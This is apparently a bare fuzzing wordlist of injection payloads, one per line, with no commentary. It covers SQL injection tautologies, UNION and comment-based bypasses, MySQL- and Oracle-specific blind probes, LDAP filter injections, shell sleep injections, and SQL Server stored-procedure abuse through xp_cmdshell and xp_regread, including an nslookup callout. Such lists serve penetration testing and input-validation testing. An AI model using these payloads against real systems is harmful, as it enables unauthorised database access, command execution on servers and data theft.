
0 or 1=1
1;SELECT%20*
!
"
"%20or%20"x"="x
"' or 1 --'"
") or ("a"="a
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
" or "a"="a
#
%2A%7C
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%7C
%20$(sleep%2050)
%20'sleep%2050'
%21
%26
%27%20or%201=1
%28
%29
&
&apos;%20OR
&lt;&gt;&quot;'%;)(&amp;+
'
'%20--
'%20;
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
' (select top 1
')%20or%20('x'='x
') or ('a'='a
'; exec master..xp_cmdshell
'; exec xp_regread
' UNION ALL SELECT
' UNION SELECT
'hi' or 'x'='x';
' or 0=0 #
' or 0=0 --
' or 1=1 or ''='
' or 1=1 or ''='
' or 1=1--
'or%20select *
' or '1'='1'--
' or ''='
' or (EXISTS)
' or a=a--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
'sqlattempt1
'||UTL_HTTP.REQUEST
(
(sqlattempt2)
)
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
,@variable
-
--
--';
--sp_password
/
//
//*
<>"'%;)(&+
=%20'
=%20--
=%20;
@variable
PRINT
PRINT @@variable
\x3D%20\x3B'
\x3D%20\x27
\x23
\x27
\x27UNION SELECT
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
admin'--
as
asc
bfilename
char%4039%41%2b%40SELECT
delete
desc
distinct
exec sp
exec xp
handler
having
hi") or ("a"="a
hi" or 1=1 --
hi" or "a"="a
hi') or ('a'='a
hi' or 1=1 --
hi' or 'a'='a
insert
like
limit
or
or 0=0 #
or 0=0 --
or 1=1--
or%201=1
or%201=1 --
order by
procedure
replace
select
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
update
x' or 1=1 or 'x'='y
|
1e100
2 or 2=2
2' or '2'='2
999999999999999999
" or 1=1#
#mysql
'
'#mysql
'/*ora_mysql*/and/**/'2'='0
'/*ora_mysql*/and/**/'2'='2
'/*ora_mysql*/or/**/'2'='2
' and '2'='0
' and '2'='0'#mysql
' and '2'='0'-- oracle
' and '2'='2
' and '2'='2'#mysql
' and '2'='2'-- oracle
' or 1=1--
' or '2'='2
'test
'test--
--ora_sqls
/*ora_mysql*/and/**/2=0
/*ora_mysql*/and/**/2=2
admin'
admin'#
admin'--
 and 1=1
 and 2=0
 and 2=0#mysql
 and 2=0-- oracle_mysql
 and 2=2#mysql
 and 2=2-- oracle_mysql
 and USER=USER
 and user()=user()
now()
or 1=1
or 1=1#
or 1=1--
 or 2=2
order by 1--